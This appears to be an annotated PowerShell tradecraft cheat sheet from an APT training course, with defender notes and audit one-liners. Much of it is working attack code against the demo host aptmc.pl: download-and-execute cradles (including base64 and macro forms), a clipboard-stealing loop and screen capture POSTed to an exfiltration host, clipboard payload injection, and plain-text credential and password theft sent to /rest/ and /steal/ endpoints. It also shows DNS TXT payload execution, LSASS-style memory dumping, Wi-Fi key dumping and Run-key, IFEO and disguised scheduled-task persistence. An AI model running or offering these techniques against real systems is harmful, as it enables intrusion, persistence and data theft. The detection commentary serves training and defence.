(c) 2020 Paweł Maziarz https://aptm.in/ https://aptm.in/omh20
xxxxxxxxxx
# Built-in discovery: help on the help system itself, the about_* topics, refreshing
# local help content (needs network), and listing aliases and commands.
# Reviewer note: Get-Alias is the tool for reading the rest of this sheet (and any
# transcript/log that uses it) — most lines below use short aliases such as gp, sp,
# ni, iwr, irm, iex, gcb, scb, ps, sls; resolve them before judging what a line does.
help help
help about
Update-Help
Get-Alias
Get-Command
# Get-Member lists the properties/methods of whatever object comes down the pipe.
"string" | Get-Member
xxxxxxxxxx
# Installs PowerShell 7 by fetching the official installer script (irm) and running it
# in-process (iex) with the -UseMSI switch passed through; nothing is written to disk
# before execution. Note for detection engineering: this legitimate installer uses the
# same irm/iex download-and-execute pattern as the download cradle further down, so a
# rule keyed only on "irm ... | iex" will fire here too.
iex "& { $(irm https://aka.ms/install-powershell.ps1) } -UseMSI"
xxxxxxxxxx
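# Chocolatey bootstrap (the install one-liner published at chocolatey.org). The
# execution-policy change is scoped to this process only and does not persist; execution
# policy is a guard against running scripts by accident, not a security boundary.
# The original line carried a stray U+2022 bullet between ';' and 'iex' (a copy/paste
# artifact) that makes PowerShell look for a command named '•iex'; it is a space here.
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))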
xxxxxxxxxx
# Install and start the in-box OpenSSH server. Find the capability name, add it,
# make the service start automatically (persists across reboots) and start it now.
# Reviewer note: this opens a new remote entry point on the host; an sshd service set
# to Automatic that nobody provisioned is worth a look during an audit.
Get-WindowsCapability -online|? Name -like '*SSH*'
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
Set-Service sshd -StartupType Automatic
Get-Service sshd
# gm (Get-Member) shows what the ServiceController object exposes.
Get-Service sshd | gm
Get-Service sshd | Start-Service
xxxxxxxxxx
# Process inventory. ConvertTo-Html writes a report to ps.html in the current directory.
# Selecting path and company is a quick triage view: processes with an empty company or
# a path outside the usual system/program locations deserve a closer look.
Get-Process
ps | gm
ps | ConvertTo-Html > ps.html
ps | select path,company,cpu
# Top 10 by CPU, descending.
ps | select name,path,company,cpu | sort cpu -desc -Top 10
xxxxxxxxxx
# Download cradle: fetch a script from the demo host and execute it in memory.
# The -enc form below is the same command base64-encoded as UTF-16LE; script block
# logging (enabled further down on this sheet) records the decoded text, so defenders
# do not have to decode the argument by hand. The commented VBA stub shows how such a
# command is launched from a document macro with a hidden window (vbHide) — a
# Document_Open macro spawning cmd/powershell is the parent-child chain to alert on.
iwr aptmc.pl/calc | iex
powershell -enc aQB3AHIAIABhAHAAdABtAGMALgBwAGwALwBjAGEAbABjACAAfAAgAGkAZQB4AA==
#Sub Document_Open
# Shell "cmd /c powershell -enc aQB3AHIAIABhAHAAdABtAGMALg[…]",vbHide
#End Sub
xxxxxxxxxx
# Get-PSProvider lists the drive providers (Registry, FileSystem, ...) that make
# "HKCU:" paths usable. The TrustRecords key holds the documents a user has trusted
# (Enable Editing / Enable Content); the value names identify those documents, which
# in incident response answers "which file did the user click through on".
Get-PSProvider
(ls "HKCU:\Software\Microsoft\Office\*\*\Security\Trusted Documents\TrustRecords").Property
xxxxxxxxxx
# Run-key persistence demo: a value named "omh" that launches calc via powershell at
# logon. HKCU affects only the current user and needs no elevation; HKLM applies to every
# user and requires write access to the key (see the Get-Acl line further down).
# Both locations are covered by the audit commands that follow this block.
New-ItemProperty HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name omh -Value "powershell calc.exe"
New-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name omh -Value "powershell calc.exe"
xxxxxxxxxx
# Audit the classic autostart locations: the per-user Run key, the machine-wide Run key
# and the 32-bit view on 64-bit Windows (WOW6432Node). The ACL of the HKLM key shows
# who is able to write it, i.e. who could plant machine-wide persistence.
Get-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty -Path HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Get-Acl -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | fl
xxxxxxxxxx
# Image File Execution Options "Debugger" demo: once the value exists, starting foo.exe
# runs the Debugger command instead, with the original command line appended — the
# trailing ";#" in the value turns that appended text into a PowerShell comment.
# Writing under HKLM requires administrative rights. Line 3 is lines 1+2 as one pipeline.
# The audit query for this technique is the gp ...\Image File Execution Options\* line
# that follows this block.
ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe"
sp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe" -name Debugger -Value "powershell -c ps|ogv -wait;#"
ni -f "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\foo.exe" | sp -name Debugger -Value "powershell -c ps|ogv -wait;#"
xxxxxxxxxx
# List every IFEO entry that carries a Debugger value. On a clean system this should
# be empty or contain only entries you can attribute to a known product.
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*" |
  Where-Object { $_.Debugger } |
  Select-Object -Property PSChildName, Debugger
xxxxxxxxxx
# Clipboard collection loop: every 60 s the clipboard text (gcb -f t = Get-Clipboard
# -Format Text) is appended to %TEMP%\clip and that file is POSTed (iwr -me po -i =
# -Method Post -InFile) to the exfil host. Observable artifacts for defenders: the
# growing %TEMP%\clip file, a fixed-interval POST beacon, and a long-running
# powershell process doing clipboard reads.
while ($True) {
gcb -f t >> $env:temp\clip
iwr -me po -i "$env:temp\clip" exfil.aptmc.pl
sleep 60
}
xxxxxxxxxx
# Clipboard tampering loop: every 5 s, if the clipboard text mentions ".exe" and does
# not already contain the payload, the payload plus CRLF is appended (scb = Set-Clipboard)
# so that a pasted command carries the extra line. Detection: clipboard writes from a
# script host, and the download cradle text itself in script block logs.
# NOTE: the closing quote on the $payload line is a typographic ” (U+201D), not ",
# so as printed here the string literal is unterminated.
$payload = "iwr aptmc.pl/calc|iex”
while ($True) {
$clip = gcb -f t
if ($clip -match "\.exe" -and $clip -notmatch $payload) {
scb "$clip;$payload`r`n"
}
sleep 5
}
xxxxxxxxxx
# Screenshot via the PrintScreen key: load WinForms, send {PRTSC} (which copies the
# screen to the clipboard) and save the clipboard image to %TEMP%\shot.png.
# Artifact on disk: $env:temp\shot.png.
[void][reflection.assembly]::loadwithpartialname("system.windows.forms")
[system.windows.forms.sendkeys]::sendwait('{PRTSC}')
(gcb -f Image).Save("$env:temp\shot.png")
xxxxxxxxxx
# Transcription. The first two lines record only the current session
# (-IncludeInvocationHeader adds a timestamped header per command). The policy key
# turns transcription on machine-wide for sessions started afterwards — the same
# setting the "Turn on PowerShell Transcription" GPO writes; an OutputDirectory value
# under the same key points transcripts at a central, preferably write-only, share.
Start-Transcript
Start-Transcript -IncludeInvocationHeader
New-Item -Force HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription -Name EnableTranscripting -Value 1
xxxxxxxxxx
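# Enable script block logging machine-wide via the policy key (the same setting as the
# "Turn on PowerShell Script Block Logging" GPO). Logged blocks appear in the
# Microsoft-Windows-PowerShell/Operational log as event 4104 and contain the code as
# executed — i.e. after -enc decoding or an iwr/irm download — which is what makes this
# the single most useful control against the one-liners on this sheet.
# The key name is spelled the same on both lines; registry names are case-insensitive,
# so the original "ScriptBLockLogging" worked, but it read as a typo.
New-Item -Force HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 1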
xxxxxxxxxx
# Location of the PSReadLine console history file (commands typed interactively, kept
# across sessions). Useful both for IR — it often holds the exact lines an operator
# typed, including -enc blobs — and as a reminder that this file is a credential leak
# risk when secrets are typed on the command line.
gci (Get-PSReadLineOption).HistorySavePath
xxxxxxxxxx
# Scheduled-task persistence demo: daily at 16:32 run a hidden (-w h) PowerShell that
# pulls and executes the download cradle (-useb = -UseBasicParsing). The task name and
# description imitate Windows Update. Triage cue: a "Windows Update" task whose action
# is powershell.exe with a URL in its arguments. The Get-ScheduledTask one-liner that
# follows this block lists actions for exactly that purpose.
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-w h -c "&{iwr -useb aptmc.pl/calc|iex}"'
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries
$trigger = New-ScheduledTaskTrigger -Daily -At 16:32
Register-ScheduledTask -Settings $settings -Action $action -Trigger $trigger -TaskName "Windows Update Checker" -Description "Checks if there is an update available"
xxxxxxxxxx
# Flatten every scheduled task to name / path / executable / arguments and browse the
# result in a grid. Tasks with several actions show arrays in Execute and Args.
Get-ScheduledTask |
  ForEach-Object {
    [pscustomobject]@{
      Name    = $_.TaskName
      Path    = $_.TaskPath
      Execute = $_.Actions.Execute
      Args    = $_.Actions.Arguments
    }
  } |
  Out-GridView
xxxxxxxxxx
# NTFS alternate data streams. The first line walks $HOME (gi -s * = Get-Item -Stream *)
# and drops the default ":$DATA" stream, leaving only files that carry extra streams.
# The second reads the Zone.Identifier stream (Mark-of-the-Web) of one file; its absence
# on a file that arrived from the internet suggests it was unblocked or written by a
# tool that does not set the mark.
gci -r $HOME|gi -s *|where Stream -ne ':$DATA'|select Filename,Stream
gc remote.ps1 -Stream Zone.Identifier
xxxxxxxxxx
# cmd.exe AutoRun demo: the value is executed every time cmd.exe starts (here it just
# opens mspaint). Audit this value under HKCU and its HKLM counterpart; an AutoRun that
# points at anything other than an expected environment setup script is suspicious.
ni -p "HKCU:\Software\Microsoft\Command Processor" -f|sp -n AutoRun -v "mspaint"
xxxxxxxxxx
# Enumerate HID device instances (keyboards, mice and the like) the system has seen.
# In IR this helps answer whether an unexpected USB input device was ever attached.
ls HKLM:\SYSTEM\CurrentControlSet\Enum\HID\*
xxxxxxxxxx
# Win+R (Run dialog) history. MRUList is a string of letters, most recent first; each
# letter is the name of a value holding one command, so the loop prints them in order.
$i=gp HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; $i.MRUList.ToCharArray()|%{$i.$_}
xxxxxxxxxx
# Sysinternals tools record EULA acceptance per tool under this key, so the subkey
# names double as a list of which Sysinternals tools this user has run.
ls HKCU:\Software\Sysinternals|select Name
xxxxxxxxxx
# LDAP queries against the current domain via [adsisearcher]: all computer objects, then
# all accounts registering a MSSQLSvc service principal name. Any domain user can run
# these; accounts with SPNs are what Kerberoasting-style attacks target, so broad SPN
# queries are a detection candidate and such accounts should be gMSAs or have long,
# rotated passwords.
([adsisearcher]"objectCategory=computer").FindAll()
([adsisearcher]"servicePrincipalName=MSSQLSvc/*").FindAll()
xxxxxxxxxx
# Network recon from the host: the public IP via ipinfo.io, a reverse-DNS sweep of the
# 46.229.145.0/24 range (errors suppressed), and every saved Wi-Fi profile with its
# key in clear text. The last one is a plain netsh invocation, so process command-line
# logging ("wlan show profile ... key=clear") is the place to catch it.
(irm ipinfo.io/json).ip
1..254 | % {Resolve-DnsName 46.229.145.$_ -ErrorAction SilentlyContinue}
(netsh wlan show profiles)|%{$n=(""+($_ -split ":")[1]).trim(); netsh wlan show profile name="$n" key=clear}|sls "Key Content","SSID name"
xxxxxxxxxx
# Code delivery over DNS TXT records. Line 1 resolves via DNS-over-HTTPS (dns.google),
# which never touches the local DNS client — so it leaves nothing in the DNS cache
# checked further down and bypasses resolver-side logging; watch for HTTPS to public DoH
# endpoints instead. Line 2 uses the normal resolver, base64-decodes the record and runs
# it; that lookup does show up in the client cache and DNS logs.
(irm "https://dns.google/resolve?name=calc.aptmc.pl&type=txt").answer.data|iex|iex
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Resolve-DnsName -Type TXT msg.aptmc.pl).strings))|iex
xxxxxxxxxx
# Inspect the local DNS client cache — names resolved through the system resolver
# recently. Lookups done over DNS-over-HTTPS by an application do not appear here.
Get-DnsClientCache | Select-Object -Property data, entry | fl
ipconfig /displaydns
xxxxxxxxxx
# Process memory dumping. Out-Minidump is pulled from PowerSploit and run in memory,
# Notepad is dumped, strings.exe is fetched from live.sysinternals.com and the dump is
# searched for "password" with two lines of context. The last line is the comsvcs.dll
# MiniDump LOLBin (555 is a placeholder PID, written to 555.dmp). Detection points:
# rundll32 loading comsvcs.dll with "MiniDump" on the command line, new *.dmp files,
# and the PowerSploit download in script block / proxy logs.
iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1|iex
$dump=(ps -name Notepad|out-minidump)
iwr https://live.sysinternals.com/tools/strings.exe -OutFile strings.exe
.\strings.exe -accepteula -n 10 $dump | select-string -Context 2 password
rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full
xxxxxxxxxx
# Full-screen capture exfiltrated in memory: the virtual screen is copied into a Bitmap,
# encoded as JPEG into a MemoryStream, base64-encoded and POSTed to aptmc.pl on port 7777.
# No file is written, so the signal is a large base64 POST body to a non-standard port
# from a script host, plus the System.Drawing/WinForms loads in script block logs.
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width, $Height = $Screen.Width, $Screen.Height
$Left , $Top = $Screen.Left, $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$ms=[System.IO.MemoryStream]::new()
$bitmap.Save($ms, [System.Drawing.Imaging.ImageFormat]::jpeg)
$graphic.Dispose()
$imgb64=[System.Convert]::ToBase64String($ms.GetBuffer())
iwr -me po -b $imgb64 http://aptmc.pl:7777
xxxxxxxxxx
# Show and then set the session language mode. Setting ConstrainedLanguage here only
# affects this session — a freshly started powershell.exe is FullLanguage again — so the
# enforced form of this control comes from a WDAC/AppLocker policy, not from this line.
# Much of this sheet (Add-Type, [reflection.assembly], Marshal calls) would fail under
# ConstrainedLanguage.
$ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
xxxxxxxxxx
# Credential handling in remoting: the script block receives a PSCredential through
# $using:, recovers the plain-text password from the SecureString via the
# SecureStringToBSTR / PtrToStringAuto pair, and sends it as an HTTP Basic Authorization
# header together with the local user list (JSON) to the demo REST endpoint.
# Invoke-Command against localhost/127.0.0.1 requires WinRM to be enabled. The
# SecureString-to-BSTR pattern is a well-known marker to hunt for in script block logs.
$scr = {
$uri = 'https://aptmc.pl/ps1/rest/'
$username = $using:creds.UserName
$password = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($using:creds.Password))
$auth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${username}:${password}"))
Invoke-RestMethod -Headers @{Authorization=("Basic {0}" -f $auth)} -Uri $uri -Body @{Users=(Get-LocalUser|ConvertTo-Json)} -Method Post
}
$creds = Get-Credential
Invoke-Command -ComputerName localhost,127.0.0.1 -ScriptBlock $scr
xxxxxxxxxx
# Variable hook via a validation attribute. sv -o a -p resolves to Set-Variable -Option
# AllScope -PassThru; the returned PSVariable for $password gets a [ValidateScript]
# attribute whose script POSTs every value later assigned to $password and returns $true
# so the assignment still succeeds. The hook lives only in this session; it is visible
# with (Get-Variable password).Attributes and in script block logs.
(sv -o a -p password "").attributes.add([validatescript]({irm https://aptmc.pl/ps1/steal/ -me po -b $_;return $true}))
xxxxxxxxxx
# Preparing to tamper with a built-in module: take ownership of the module file and
# grant the Administrators group full control ("administratorzy" is the Polish-localized
# group name). Built-in module files are normally owned by TrustedInstaller, so the
# ownership/ACL change is itself an auditable event (object access auditing / FIM), and
# Get-AuthenticodeSignature on the module will report whether its signature still holds.
takeown.exe /f Microsoft.PowerShell.Utility.psm1
icacls.exe Microsoft.PowerShell.Utility.psm1 /grant administratorzy:f
-- Enjoy! Tak się bawimy na https://aptmasterclass.com/forge/ :)